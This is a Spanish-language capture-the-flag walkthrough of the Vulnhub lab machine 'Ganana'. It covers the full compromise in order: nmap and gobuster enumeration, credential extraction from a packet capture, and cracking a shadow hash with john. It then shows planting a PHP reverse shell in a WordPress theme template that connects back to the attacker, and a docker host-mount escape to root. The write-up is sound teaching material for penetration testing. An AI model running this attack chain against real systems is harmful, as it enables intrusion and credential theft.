[VLN] Ganana

Hoy vamos a hackear la maquina de Vulnhub llamada Ganana. Podeis descargarla desde el siguiente enlace: Ganana

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.142
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-26 16:42 CEST
Nmap scan report for debian.home (192.168.1.142)
Host is up (0.0014s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE  VERSION
22/tcp   closed ssh
80/tcp   open   http     Apache httpd (PHP 7.3.17)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Ganana
443/tcp  open   ssl/http Apache httpd (PHP 7.3.17)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Ganana
| ssl-cert: Subject: commonName=www.example.com/organizationName=Bitnami
| Not valid before: 2020-06-06T10:55:45
|_Not valid after:  2030-06-04T10:55:45
6777/tcp open   ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.148
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.04 seconds
Exploramos un poco mas el puerto 80.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.142 -w 
/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.142
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/26 16:57:41 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/! (Status: 301)
/0 (Status: 301)
/0000 (Status: 301)
/asdfjkl; (Status: 301)
/atom (Status: 301)
/dashboard (Status: 302)
/embed (Status: 301)
/favicon.ico (Status: 302)
/feed (Status: 301)
/fixed! (Status: 301)
/license (Status: 200)
/logout (Status: 403)
/lostpassword (Status: 200)
/page1 (Status: 301)
/phpmyadmin (Status: 301)
/rdf (Status: 301)
/readme (Status: 200)
/register (Status: 302)
/robots.txt (Status: 200)
/rss (Status: 301)
/rss2 (Status: 301)
/secret (Status: 302)
/tasks (Status: 200)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-config (Status: 200)
/wp-includes (Status: 301)
===============================================================
2020/06/26 17:13:02 Finished
===============================================================
Vemos varios directorios interesantes. /secret nos lleva a un wordpress. /phpmyadmin es un phpmyadmin :) /tasks Al visitar /tasks en http://192.168.1.142/tasks nos encontramos el siguiente texto:

Hey Jarret Lee!

Do manage the office as the admin is away for a few weeks! 
Admin has created an other temp account for you and details in a pcapng file. 
Tras probar, finalmente encontramos el fichero .pcapng que menciona. Se encuentra en: http://192.168.1.142/jarret.pcapng Una vez descargado, lo vemos con Wireshark. Si miramos los paquetes HTTP que contienen POST /login... acabamos encontrando uno donde aparecen las credenciales correctas.

jarretlee/NoBrUtEfOrCe__R3Qu1R3d__
Una vez obtenidas las credenciales, nos logueamos al FTP usandolas.

sml@Cassandra:~$ ftp 192.168.1.142 6777
Connected to 192.168.1.142.
220 (vsFTPd 3.0.3)
Name (192.168.1.142:sml): jarretlee
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1000     1000         4096 Jun 25 06:25 .
drwxr-xr-x    3 600      0            4096 Jun 17 07:00 ..
-rw-------    1 1000     1000          177 Jun 17 07:47 .backups
-rw-------    1 1000     1000          515 Jun 25 06:25 .bash_history
-rw-r--r--    1 1000     1000          220 Jun 17 07:00 .bash_logout
-rw-r--r--    1 1000     1000         3526 Jun 17 07:00 .bashrc
drwx------    3 1000     1000         4096 Jun 25 06:25 .gnupg
-rw-r--r--    1 1000     1000          807 Jun 17 07:00 .profile
226 Directory send OK.
ftp> get .backups
local: .backups remote: .backups
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .backups (177 bytes).
226 Transfer complete.
177 bytes received in 0.00 secs (1.5071 MB/s)
Vemos que hay un fichero llamado .backups, lo descargamos para ver de que se trata.

sml@Cassandra:~/yeah$ cat .backups 
amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9j
RG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6
MDo5OTk5OTo3Ojo6
Vemos que se trata de Base64, asi que hacemos el decode.

sml@Cassandra:~/yeah$ echo 
"amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9
jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA
6MDo5OTk5OTo3Ojo6" | base64 -d
jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO
0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::
Parece que es la password cifrada de jeevan, con el formato que suele estar en el fichero /etc/shadow. Copiamos el usuario y la "password" a un fichero y usamos john para crackear la password.

El fichero contenia un texto 
sml@Cassandra:~$ echo 
"jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkU
O0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1" > paz.txt
sml@Cassandra:~$ /usr/sbin/john paz.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana    (jeevan)
1g 0:00:00:00 DONE (2020-06-26 23:40) 1.492g/s 3820p/s 3820c/s 3820C/s 
slimshady..hassan
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Vemos que la password del usuario jeevan es hannahmontana. Continuamos en el ftp. Esta vez vamos al directorio /opt/bitnami/apps/wordpress/htdocs y nos descargamos el fichero wp-config.php.

ftp> pwd
257 "/opt/bitnami/apps/wordpress/htdocs" is the current directory
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1             405 Feb 06 06:33 index.php
-rw-r--r--    1 1000     1000       189728 Jun 07 08:45 jarret.pcapng
-rw-rw-r--    1 1000     1           19915 Feb 12 11:54 license.txt
-rw-rw-r--    1 1000     1            7278 Jun 16 16:11 readme.html
-rw-r--r--    1 0        0             156 Jun 17 08:15 tasks.txt
-rw-rw-r--    1 1000     1            6912 Feb 06 06:33 wp-activate.php
drwxrwxr-x    9 1000     1            4096 Jun 03 11:23 wp-admin
-rw-rw-r--    1 1000     1             351 Feb 06 06:33 wp-blog-header.php
-rw-rw-r--    1 1000     1            2332 Jun 16 16:11 wp-comments-post.php
-rw-r-----    1 1000     1            4268 Jun 06 10:55 wp-config.php
drwxrwxr-x    9 1000     1            4096 Jun 06 15:08 wp-content
-rw-rw-r--    1 1000     1            3940 Feb 06 06:33 wp-cron.php
drwxrwxr-x   21 1000     1           12288 Jun 03 11:23 wp-includes
-rw-rw-r--    1 1000     1            2496 Feb 06 06:33 wp-links-opml.php
-rw-rw-r--    1 1000     1            3300 Feb 06 06:33 wp-load.php
-rw-rw-r--    1 1000     1           47874 Feb 10 03:50 wp-login.php
-rw-rw-r--    1 1000     1            8509 Apr 14 11:34 wp-mail.php
-rw-rw-r--    1 1000     1           19396 Apr 10 03:59 wp-settings.php
-rw-rw-r--    1 1000     1           31111 Feb 06 06:33 wp-signup.php
-rw-rw-r--    1 1000     1            4755 Feb 06 06:33 wp-trackback.php
-rw-rw-r--    1 1000     1            3133 Feb 06 06:33 xmlrpc.php
226 Directory send OK.
ftp> get wp-config.php
local: wp-config.php remote: wp-config.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for wp-config.php (4268 bytes).
226 Transfer complete.
4268 bytes received in 0.00 secs (5.0815 MB/s)
Vemos a ver si tiene lo que buscamos :)

sml@Cassandra:~/yeah$ cat wp-config.php
---SNIP---
/** MySQL database username */
define( 'DB_USER', 'bn_wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'aa75e9f9b1' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost:3306' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
---SNIP---
Bien, tenemos unos credenciales! Los usamos para entrar en phpmyadmin http://192.168.1.142/phpmyadmin/ En la BBDD bitnami_wordpress vamos a la tabla wp_users y cambiamos la password del usuario charleywalker por la de jarretlee, ya que la conocemos. Una vez cambiada, entramos en wordpress con el usuario charleywalker y la password que hemos cambiado... es decir, la misma password que usa jarretlee. Preparamos una reverse shell.

sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
sml@Cassandra:~$ mv php-reverse-shell.php rshell.php
sml@Cassandra:~$ nano rshell.php #Editamos con nuestra IP/Puerto.
En wordpress, logueados como charleywalker, vamos a Appearance --> Theme Editor -> 404 Template (404.php) Lo editamos, pegamos la reverse shell y guardamos. Ponemos nc a la escucha:

sml@Cassandra:~$ nc -nlvp 1234
listening on [any] 1234 ...
Y visitamos http://192.168.1.142/404.php

Low Shell



sml@Cassandra:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.142] 57130
Linux debian 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 
GNU/Linux
 19:57:55 up  2:04,  0 users,  load average: 0.44, 0.16, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Como en los pasos anteriores encontramos la password del usuario jeevan, usamos su para cambiar de usuario.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
daemon@debian:/home$
daemon@debian:/home/jarretlee$ su jeevan
Password: hannahmontana
jeevan@debian:/home/jarretlee$ id
uid=1003(jeevan) gid=1005(jeevan) groups=1005(jeevan),115(docker)
Vemos que jeevan esta en el grupo de docker, vamos a ver que imagenes hay.

jeevan@debian:/tmp$ docker images
docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             
SIZE
bash                latest              0980cb958276        3 weeks ago         
13.1MB
alpine              latest              a24bb4013296        3 weeks ago         
5.57MB
hello-world         latest              bf756fb1ae65        5 months ago        
13.3kB
Tenemos una imagen de bash que nos puede ser util :) Montamos la / del sistema en /mnt/mygod del container que vamos a ejecutar, en el cual al tener privilegios de root podremos ver toda la raiz del sistema host que hemos montado en /mnt/mygod...

root.txt



jeevan@debian:/tmp$ docker run -v /:/mnt/mygod -ti 0980cb958276
docker run -v /:/mnt/mygod -ti 0980cb958276
bash-5.0# cd /mnt/mygod/root
bash-5.0# ls
bitnami              jeevan
bitnami_credentials  root.txt
bash-5.0# cat root.txt

                    _       _                 _                              _  
  
 __ __ __  ___     | |     | |      o O O  __| |    ___    _ _      ___     | | 
  
 \ V  V / / -_)    | |     | |     o      / _` |   / _ \  | ' \    / -_)    |_| 
  
  \_/\_/  \___|   _|_|_   _|_|_   TS__[O] \__,_|   \___/  |_||_|   \___|   
_(_)_  
_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_| """ 
| 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-
' 

End


Y con esto ya seriamos root de la maquina :)